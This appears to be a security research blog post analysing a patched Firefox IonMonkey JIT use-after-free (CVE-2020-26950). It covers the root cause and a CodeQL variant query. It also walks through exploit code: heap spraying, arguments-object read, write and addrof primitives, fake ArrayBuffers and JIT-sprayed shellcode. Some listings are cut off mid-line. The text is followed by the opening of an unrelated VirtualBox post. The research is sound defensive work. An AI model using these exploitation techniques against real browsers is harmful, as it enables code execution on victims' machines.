
Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.

Introduction

At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications, and improvements to allocators, lazy generation, and garbage collection simply weren’t enough to make it so. Fast forward to 2008, when Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp
ret

This is important because the function would otherwise be executed as JavaScript bytecode in the JavaScript Virtual Machine, which, compared to assembly, is significantly slower.

Since JIT compilation is quite a slow process due to the large number of optimisations that take place (such as constant folding, shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.
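
As a rough illustration, a function only becomes a JIT candidate once it has run hot. The exact threshold is engine- and version-specific, so the numbers below are just an example:

function add() {
    return 1+1;
}

// Run the function enough times that the engine considers it hot and hands it
// to the JIT compiler; the threshold varies between engines and versions.
for (let i = 0; i < 20000; i++) {
    add();
}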

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i < 10) {
		return i + 1;
	}
	return i + 2;
}

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they load rather than store values. Because there are no Store nodes between them that affect the variable they’re loading from, they all share the same dependency. And since they are identical nodes with the same dependency, the duplicates can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.
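
To make this concrete, here is a sketch of the difference, assuming o.x is a plain data property:

// Both reads of o.x can share a single load node: nothing stores to o.x in between.
function twoLoads(o) {
    return o.x + o.x;
}

// Here the store to o.x aliases with the second read, so the second load depends
// on the store and cannot be eliminated.
function loadStoreLoad(o) {
    let a = o.x;
    o.x = a + 1;
    return a + o.x;
}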

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.
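
This laziness is invisible from script, but the idea can be sketched as follows (exactly when the engine materialises the property is an internal detail, so the comments are assumptions rather than observable behaviour):

function f() {}

// From script the property is simply there, but an engine like Spidermonkey may
// only create it (via the class resolve hook, fun_resolve) the first time it is
// actually looked up:
f.prototype;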

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2
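
For reference, JavaScript along these lines would produce a node sequence like the one above (a sketch, assuming x and y are plain data properties of o):

function readTwo(o) {
    // One shape guard and one slots fetch can serve both property reads.
    return o.x + o.y;
}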

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:

Use-after-free

The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.
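
In other words (a sketch; the class below is only there to show where JSOp::SuperCall comes from):

function cons() {}

cons();      // JSOp::Call      - not constructing, cannot reach the vulnerable path
new cons();  // JSOp::New       - constructing, goes through createThisScripted

class C extends cons {
    constructor() {
        super(); // JSOp::SuperCall - also constructing
    }
}
new C();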

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
 
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}
 
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}
 
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f)or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}
 
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}
 
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
 
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
 
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i 

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straightforward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs come with a number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer being saved and it being used after the free do not alias with the use. If they did, a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for object buffers, defined by the constant MaxNurseryBufferSize, which is 1024 bytes.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has less than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.
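
For example, something along these lines should be enough to push an object’s slots array into the tenured heap as a jemalloc Large allocation (a sketch; the property count is simply chosen to clear the thresholds described above):

let obj = {};

// Enough named properties that the slots array exceeds the nursery buffer limit
// and, at 256 slots or more, lands in jemalloc's "Large" size classes.
for (let i = 0; i < 512; i++) {
    obj["p" + i] = i;
}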

Reallocating

In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
 
   new cons(); // Trigger the vulnerability - Reallocates the object slots
 
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
  
   // Avoid Elements Copy-On-Write by pushing a value
   target.push(i);
  
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
 
   // Return the corrupted array
   return target;
}
 
/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
 
   // We'll create one object...
   var cons = function() {};
   for(i=0; i

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Our corruption, however, is in the tenured heap, which puts the ArrayBuffer object itself out of reach since it lives in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and has thus created a separate arena for it:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}

arg(1,2);

Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}

arg(1);

To avoid needing separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
 
// Global that holds the target argument so it can be used later
arg = 0;
 
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
 
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
 
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
 
       // If it was null, then we return and try the next one
       return 0;
   }
 
   // Get the cons value
   let cons = arguments[0][arguments[1]];
 
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
 
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ); // Goes on to 480
 
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
 
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
 
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
 
   // Otherwise just return 0 and try the next one
   return 0;
}
 
/*
   main - Performs the exploit
*/
function main() {
   ...
 
   //
   TOTAL=arr.length;
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ); // Goes on to 480
}

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
 
   // Used to hold the leaked data
   let val = 0;
  
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
   for(let i = 32; i >= 0; i--) {
       val = val = 0; i--) {
       val[0] = val[0] 
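
The listing above is truncated, so here is a minimal sketch of what a complete bit-by-bit 32-bit read could look like, assuming evil is the corrupted array whose index 511 overlaps the RareArgumentsData pointer and arg is the captured arguments object:

function weak_read32(arg, addr) {
    // Point the RareArgumentsData pointer at the target address
    evil[511] = addr;

    let val = 0;

    // Walk the bits from most to least significant; a "deleted" argument
    // (which reads back as undefined) means the corresponding bit is set.
    for (let i = 31; i >= 0; i--) {
        val = val << 1;
        if (arg[i] === undefined) {
            val = val | 1;
        }
    }

    // Return as an unsigned 32-bit value
    return val >>> 0;
}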

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straightforward by iterating backwards from the RareArgumentsData pointer that was leaked using the corrupted array (the ArgumentsObject was allocated before the RareArgumentsData pointer, so we work backwards):

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
 
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation
   while(counter 
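
The helper dbl_to_bigint used here is not shown in the truncated listings; a minimal sketch of what it presumably does, reinterpreting the raw bytes of a double on a little-endian host, along with a hypothetical inverse (bigint_to_dbl) that the later sketches use:

// Shared scratch buffer so the two views alias the same 8 bytes
let conv_buf = new ArrayBuffer(8);
let conv_f64 = new Float64Array(conv_buf);
let conv_u32 = new Uint32Array(conv_buf);

function dbl_to_bigint(val) {
    conv_f64[0] = val;
    return (BigInt(conv_u32[1]) << 32n) | BigInt(conv_u32[0]);
}

function bigint_to_dbl(val) {
    conv_u32[0] = Number(val & 0xffffffffn);
    conv_u32[1] = Number(val >> 32n);
    return conv_f64[0];
}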

The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
 
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter
   while(counter 
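
The loop body is cut off here; a hypothetical reconstruction of the scan, reusing weak_read32 and the conversion helpers sketched earlier (the bound, the step size, and exactly which field is matched are guesses):

    while (counter < 0x10000) {
        // The unusually large length value (0x101337) is easy to spot in memory
        if (weak_read32(arg, bigint_to_dbl(iterator)) == 0x101337) {
            // The real exploit presumably adjusts for the offset of the length
            // field within the object; here we just record where it was found
            arr_buf_addr = iterator;
            break;
        }
        iterator += 8n;
        counter += 1;
    }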

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
  
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;
   for(i=0;i
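
The clone loop is likewise cut off; one plausible shape for it, copying the typed array object’s raw words into the start of its own backing store via the read primitive (the 0x40-byte size is an assumption, not the exploit’s actual value):

    iterator = arr_buf_addr;
    for (i = 0; i < 0x40 / 4; i++) {
        // Read 4 bytes of the real object and write them into its own backing
        // store, building the fake object that fake_arrbuf will later overlay
        target_uint32arr[i] = weak_read32(arg, bigint_to_dbl(iterator));
        iterator += 4n;
    }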

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i 
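
A sketch of what the truncated write_nan likely does: point RareArgumentsData at the 8 bytes holding the unboxed pointer, then turn on only the top tag bits by deleting the corresponding argument indices:

function write_nan(arg, addr) {
    evil[511] = addr;

    // The top bits form the NaN-box tag of a pointer value; deleting argument i
    // sets bit i of the bitmap at addr, so only these tag bits get switched on.
    for (let i = 64 - 15; i < 64; i++) {
        delete arg[i];
    }
}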

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
   return (BigInt(fake_arrbuf[1] & 0xffff) 

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

/*
   shellcode - Constant values which hold our shellcode to pop xcalc.
*/
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}
 
/*
   main - Performs the exploit
*/
function main() {
   for(i = 0;i 
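
The truncated loop in main presumably just calls shellcode() enough times for IonMonkey to compile it, so that the constants end up in an executable JIT region (the iteration count here is a guess):

    for (i = 0; i < 0x10000; i++) {
        shellcode();
    }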

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon! pic.twitter.com/g6K9tuK4UG

— maxpl0it (@maxpl0it) February 1, 2022

Conclusion

Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives were found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

GSOh No! Hunting for Vulnerabilities in VirtualBox Network Offloads

23 November 2021 at 11:56

Introduction

The Pwn2Own contest is like Christmas for me. It’s an exciting competition which involves rummaging around to find critical vulnerabilities in the most commonly used (and often the most difficult) software in the world. Back in March, I was preparing to have a pop at the Vancouver contest and had decided to take a break from writing browser fuzzers to try something different: VirtualBox.

Virtualization is an incredibly interesting target. The complexity involved in both emulating hardware devices and passing data safely to real hardware is astounding. And as the mantra goes: where there is complexity, there are bugs.

For Pwn2Own, it was a safe bet to target an emulated component. In my eyes, network hardware emulation seemed like the right (and usual) route to go. I started with a default component: the NAT emulation code in /src/VBox/Devices/Network/DrvNAT.cpp.

At the time, I just wanted to get a feel for the code, so there was no specific methodical approach to this other than scrolling through the file and reading various parts.

During my scrolling adventure, I landed on something that caught my eye:

static DECLCALLBACK(void) drvNATSendWorker(PDRVNAT pThis, PPDMSCATTERGATHER pSgBuf)
{
#if 0 /* Assertion happens often to me after resuming a VM -- no time to investigate this now. */
   Assert(pThis->enmLinkState == PDMNETWORKLINKSTATE_UP);
#endif
